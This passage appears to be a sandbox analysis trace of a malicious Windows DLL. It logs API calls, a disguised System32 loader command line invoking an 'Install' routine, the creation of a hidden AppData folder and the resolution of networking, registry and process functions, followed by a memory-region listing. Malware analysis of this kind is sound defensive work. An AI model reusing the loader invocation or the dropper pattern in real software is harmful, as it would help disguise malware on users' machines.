GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.063] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.063] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.063] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.064] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.064] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.064] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.064] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.064] GetLastError () returned 0xb7 [0033.064] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.064] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.064] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.064] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.064] wsprintfA (in: param_1=0x22f410, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.064] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.064] wsprintfA (in: param_1=0x22f30c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.064] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.064] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.064] CloseHandle (hObject=0x74) returned 1 [0033.064] GetLastError () returned 0x0 [0033.064] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.064] GetLastError () returned 0x0 [0033.064] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.065] GetSystemDirectoryA (in: lpBuffer=0x22f410, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.065] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.065] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.065] CloseHandle (hObject=0x74) returned 1 [0033.065] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.065] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.065] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.066] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.066] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.066] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.066] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.066] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.067] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.067] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.067] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.067] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.068] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.068] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.068] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.068] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.068] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.068] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.068] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.068] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.069] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.069] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.069] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.069] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.069] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.069] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.069] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.069] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.071] HeapDestroy (hHeap=0x12e0000) returned 1 Process: id = "31" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fa40" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1434 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1435 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1436 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1437 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1438 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1439 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1440 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1441 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1442 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1443 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1444 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1445 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1446 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1447 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1448 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1449 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1450 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1451 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1452 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1453 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1454 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1455 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1456 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1457 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1458 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1459 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1460 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1461 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1462 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1463 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1464 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1465 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1466 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1467 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1468 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1469 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1470 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1471 start_va = 0x10e0000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 1472 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1473 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1474 start_va = 0x1200000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 68 os_tid = 0xbc8 [0033.106] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f5a4 | out: lpSystemTimeAsFileTime=0x12f5a4*(dwLowDateTime=0xe17533b0, dwHighDateTime=0x1d3dfba)) [0033.106] GetCurrentProcessId () returned 0xbc4 [0033.106] GetCurrentThreadId () returned 0xbc8 [0033.106] GetTickCount () returned 0x176e3 [0033.106] QueryPerformanceCounter (in: lpPerformanceCount=0x12f59c | out: lpPerformanceCount=0x12f59c*=366163401) returned 1 [0033.106] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.106] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.106] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.106] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.107] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.107] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.107] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.107] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.107] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.107] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.108] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.108] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.108] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.108] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.108] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.109] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.109] GetCurrentThreadId () returned 0xbc8 [0033.109] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"Install\"" [0033.109] GetEnvironmentStringsW () returned 0x177908* [0033.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x11809f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.109] FreeEnvironmentStringsW (penv=0x177908) returned 1 [0033.109] GetStartupInfoA (in: lpStartupInfo=0x12f4f4 | out: lpStartupInfo=0x12f4f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.109] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.109] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.109] SetHandleCount (uNumber=0x20) returned 0x20 [0033.109] GetLastError () returned 0x0 [0033.109] SetLastError (dwErrCode=0x0) [0033.109] GetLastError () returned 0x0 [0033.109] SetLastError (dwErrCode=0x0) [0033.110] GetLastError () returned 0x0 [0033.110] SetLastError (dwErrCode=0x0) [0033.110] GetACP () returned 0x4e4 [0033.110] GetLastError () returned 0x0 [0033.110] SetLastError (dwErrCode=0x0) [0033.110] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.110] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f4d4 | out: lpCPInfo=0x12f4d4) returned 1 [0033.110] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12efa0 | out: lpCPInfo=0x12efa0) returned 1 [0033.110] GetLastError () returned 0x0 [0033.110] SetLastError (dwErrCode=0x0) [0033.110] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x12ef30 | out: lpCharType=0x12ef30) returned 1 [0033.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f3b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f3b4, cbMultiByte=256, lpWideCharStr=0x12ed18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.110] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12efb4 | out: lpCharType=0x12efb4) returned 1 [0033.110] GetLastError () returned 0x0 [0033.110] SetLastError (dwErrCode=0x0) [0033.110] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f3b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f3b4, cbMultiByte=256, lpWideCharStr=0x12ece8, cchWideChar=256 | out: lpWideCharStr=" 